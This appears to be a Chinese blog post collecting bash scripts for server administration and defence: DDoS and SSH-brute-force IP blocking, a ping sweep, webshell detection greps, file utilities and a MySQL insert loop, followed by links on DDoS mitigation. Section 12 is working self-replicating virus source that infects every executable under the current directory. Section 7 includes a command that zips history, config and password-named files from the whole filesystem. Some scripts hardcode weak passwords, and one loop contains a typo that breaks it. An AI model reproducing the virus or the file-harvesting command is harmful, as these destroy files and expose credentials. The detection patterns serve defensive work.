一、防DDoS的一个思路(直接屏蔽):
#!/bin/bash
/bin/netstat -na | grep ESTABLISHED | awk '{print $5}' | awk -F: '{print $1}' | sort | uniq -c | sort -rn | head -10 | grep -v -E '192.168|127.0' | awk '{if($2!=null && $1>4) {print $2}}' > /tmp/dropip
for i in $(cat /tmp/dropip)
do
/sbin/iptables -A INPUT -s $i -j DROP
echo "$i kill at `date`">>/var/log/ddos
done
二、批量添加用户
#!/bin/bash for name in tom jerry joe jane do useradd $name echo redhat | passwd --stdin $name done
三、批量ping判断局域网主机存活情况
#!/bin/bash
# Checks to see if hosts 192.168.1.100-192.168.1.200 are alive
for n in {100..200}; do
host=192.168.1.$n
ping -c2 $host & >/dev/null
if [ $? = 0 ]; then
echo "$host is UP"
else
echo "$host is DOWN"
fi
done
四、起到类似DenyHosts作用的bash脚本
Ubuntu版本:
#!/bin/bash
cat /var/log/auth.log.1 | awk '/Invalid user/{print $NF}' | sort | uniq -c | awk '{print $2"="$1;}' >/root/black.txt
# awk '/Invalid user/{print $NF}' auth.log.1 | sort | uniq -c | awk '{print $2"="$1;}' >/root/black.txt
DEFINE="10"
for i in `cat /root/black.txt`
do
IP=`echo $i | awk -F= '{print $1}'`
NUM=`echo $i | awk -F= '{print $2}'`
if [ $NUM -gt $DEFINE ];
then
grep $IP /etc/hosts.deny > /dev/null
if [ $? -gt 0 ];
then
echo "sshd:$IP" >> /etc/hosts.deny
fi
fi
done
#vim /etc/crontab
#* */1 * * * root sh /root/ssh_deny.sh #每隔一个小时执行一次
适用于RedHat系列的版本:
#!/bin/bash
cat /var/log/secure | awk '/Failed/{print $(NF-3)}' | sort | uniq -c | awk '{print $2"="$1;}' >/root/black.txt
DEFINE="10"
for i in `cat /root/black.txt`
do
IP=`echo $i | awk -F= '{print $1}'`
NUM=`echo $i | awk -F= '{print $2}'`
if [ $NUM -gt $DEFINE ];
then
grep $IP /etc/hosts.deny > /dev/null
if [ $? -gt 0 ];
then
echo "sshd:$IP" >> /etc/hosts.deny
fi
fi
done
#vim /etc/crontab
#* */1 * * * root sh /root/ssh_deny.sh #每隔一个小时执行一次
五、批量添加可执行权限
#!/bin/bash find "$PWD" -type f ( -iname '*.sh' -o -iname '*.csh' -o -iname '*.ksh' -o -iname '*.pl' -o -iname '*.bin' -o -iname '*.run' -o -iname '*.bundle' -o -iname '*.rb' -o -iname '*.py' ) -print0 | xargs -0 chmod +x
六、定位可疑文件
#!/bin/bash
#查看当前这个目录里面是否有可疑文件{查找权限为777的目录是否存在php文件}
search_dir=$(pwd)
writable_dirs=$(find $search_dir -type d -perm 0777)
for dir in $writable_dirs
do
#echo $dir
find $dir -type f -name '*.php'
done
#黑客经常在jpg文件中插入php代码,因此在查询这些目录的时候也要查询jpg文件
find wp-content/uploads -type f -iname '*.jpg' | xargs grep -i php
#注意:-iname 表示文件名不区分大小写;grep -i 也表示查找内容不区分大小写
七、使用find命令进行查找-打包
find . -type f -name '*.php' -mtime -7
find . -type f -name '*.php' | xargs grep -l "eval *(" --color #(空格后面加上个*代表匹配任意个空格)
find . -type f -name '*.php' | xargs grep -l "base64_decode *(" --color
find . -type f -name '*.php' | xargs grep -l "gzinflate *(" --color
find . -type f -name '*.php' | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color
find . -type f -name '*.php' | xargs egrep -i "(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *("
find . -type f -name '*.php' | xargs egrep -i "preg_replace *((['|"])(.).*2[a-z]*e[^1]*1 *," --color
diff -r wordpress-clean/ wordpress-compromised/ -x wp-content
#上面的例子是比较wordpress-clean/和wordpress-comprised/这两个目录,并且目录里面的wp-content/子目录不比较
####
find / ! -path "/usr/share/*" ! -path "/usr/lib/*" ! -path "/root/.pyenv/*" -regex ".*.sh$|.*.pl$|.*.py$|.*.conf$|.*.cnf$|.*.ini$|.*/..*history$|.*/..*pass.*" -print | zip pack.zip -@
八、删除重复的文件
#!/bin/bash
#删除指定文件夹中内容相同(Hash值相同)的文件
#用法:./removeDuplicate.sh dir_to_check
ls -lS $1 | awk 'BEGIN {
getline;getline;
name1=$9;size=$5
}
{ name2=$9; if (size==$5)
{
"md5sum " name1 | getline; csum1=$1;
"md5sum " name2 | getline; csum2=$1
if ( csum1 == csum2 )
{ print name1; print name2 }
};
size= $5; name1=name2;
}' | sort -u > duplicate_file
cat duplicate_file | xargs -I {} md5sum {} | sort | uniq -w 32 | awk '{ print $2 }' | sort -u > duplicate_sample
echo Removing...
comm duplicate_file duplicate_sample -2 -3 | tee /dev/stderr | xargs rm
echo Removed duplicate files successfully.
cat duplicate_sample | xargs echo The rest file name is
#rm -rf duplicate_sample duplicate_file
九、统计文件中的出现的单词个数&百分比
#!/bin/bash
#统计文件中的出现的单词个数&百分比
if [ $# -ne 1 ]; then
echo "Usage: $0 filename"
exit -1
fi
filename=$1
egrep -o "b[[:alpha:]]+b" $filename |
awk '{ count[$0]++;sum++ }
END{
printf("%-14s%-8s%sn", "Word", "Count", "Rate");
for (ind in count) {printf ("%-14s%-8d%.2f%%n", ind, count[ind], count[ind]/sum*100);}
}'
十、列出指定路径中的各个文件的文件类型
#!/bin/bash
#列出指定路径中的各种文件类型
if [ $# -ne 1 ];
then
echo Usage: ./$0 path_to_check;
echo
fi
path=$1
declare -A statarray;
while read line;
do
ftype=`file -b "$line"`
let statarray["$ftype"]++;
done< <(find $path -type f -print)
echo -e [+]File Types And Counts
for ftype in "${!statarray[@]}";
do
echo $ftype : ${statarray["$ftype"]}
done
十一、从指定文件中提取Email和URL的个数
#!/bin/bash
#从指定文件中提取Email和URL的个数
if [ $# -ne 1 ]; then
echo "[+]Usage:$0 filename"
exit -a
fi
file=$1
#egrep -o '[A-Za-z0-9.]+@[A-Za-z0-9.]+.[a-zA-Z]{1,4}' $file | sort | uniq -c
#echo "[+]Emails found."
egrep -o "http://[a-zA-Z0-9.]+.[A-Za-z]{1,4}" $file | sort | uniq -c
echo "[+]Urls found."
十二、自感染脚本
#!/bin/bash
#Virus by ijse start
#=====Your Code Here=========
echo "!This file has been infected by CpVirus written by ijse."
echo "!You can remove the virus code by editing this file."
echo "!Just remove the lines between '#Virus by ijse start' and '#Virus by ijse end'."
#============================
for exfile in `find ./ -executable -type f`
do
tmpFile=$exfile.tmp
firstLine=`head -2 $exfile|tail -1`
if [ "$firstLine" != "#Virus by ijse start" ]; then
endnum=`grep -n -x "#Virus by ijse end" $0 | awk -F":" '{print $1}'`
startnum=`grep -n -x "#Virus by ijse start" $0 | awk -F":" '{print $1}'`
let length=$endnum-$startnum+1
echo "`head -$endnum $0|tail -$length`" > $tmpFile
cat $exfile >> $tmpFile
chmod u+x $tmpFile
rm $exfile
mv $tmpFile $exfile
fi
done
#Virus by ijse end
十三、用Bash进行MySQL批量插入操作
#!/bin/bash
mysqllogin="mysql -uroot -p123456" #定义一个登陆mysql变量
i=100000 #定义一个学生学号变量,初始值是100000
p=18200000000 #定义一个学生手机号码变量 初始值是18200000000
whlie test $i -le 109999 #判断是不是$i小于或者等于109999,符合则返回true,继续执行
do
$mysqllogin -e "insert into test.students values ($i,$p);" #循环插入
let i=$i+1 # i值加1
let p=$p+1 # p值加1
done
待续……
说明:其中有几个脚本的内容参考了nightx.info在GitHub上的代码,自己进行了测试和一些修改。
《 “一些shell脚本的搜集” 》 有 7 条评论
FastNetMon – Debian 官方推出的一个 DDoS 检测工具,基于三个抓包引擎:NetFlow、 IPFIX、 sFLOW,可以通过外部脚本通知用户
https://packages.debian.org/sid/fastnetmon
https://github.com/pavel-odintsov/fastnetmon
写给十九大安保应急的兄弟们 来看看DDOS攻击应急预案
http://blog.nsfocus.net/ddos-attack-plan/
`
通常用三层清洗方案来防御DDoS攻击
安保中可能出现的DDoS攻击场景
摸清楚环境与资源 为DDoS应急预案提供支撑
安保应急中的DDoS攻击应急预案
`
[第10期] 低成本实现百 Gbps DDoS/CC 攻击防护
https://mp.weixin.qq.com/s/RgyPq9BA3XHJ8cW1CQD71Q
https://github.com/ismailtasdelen/Anti-DDOS/blob/master/anti-ddos.sh
DDOS攻击方式总结
https://www.secpulse.com/archives/64088.html
破坏之王:DDoS攻击与防范深度剖析
https://www.amazon.cn/%E5%9B%BE%E4%B9%A6/dp/B00JUDDZBE
DDOS攻击的治理和缓解
https://www.secpulse.com/archives/65477.html
`
1.1 DDOS攻击的治理
1.1.1 僵尸网络的治理
1.1.2 地址伪造攻击的治理
1.1.2.1 CERT
1.1.2.2 RFC 2827
1.1.2.3 Unicast Reverse Path Forwarding
1.1.2.4 分布式过滤方式
1.1.3 攻击反射点的治理
1.2攻击的缓解
1.2.1 攻击流量的稀释
1.CDN
2.Anycast
1.3 攻击流量的清洗
1.3.1 IP信誉检查
1.3.2 攻击特征匹配
1.3.3 速度检查与限制
1.3.4 TCP代理和验证
1.3.5 协议完整性验证
1.3.6 客户端真实性验证
`
一个简单的针对VPS、专用服务器和物联网设备的防ddos解决方案(An Easy and Simple Anti-DDoS solution for VPS,Dedicated Servers and IoT devices – Beta)
https://github.com/fnzv/net-Shield
浅析AnyCast网络技术
https://blog.csdn.net/enweitech/article/details/79778528
https://paper.tuisec.win/detail/da97bf895579e6e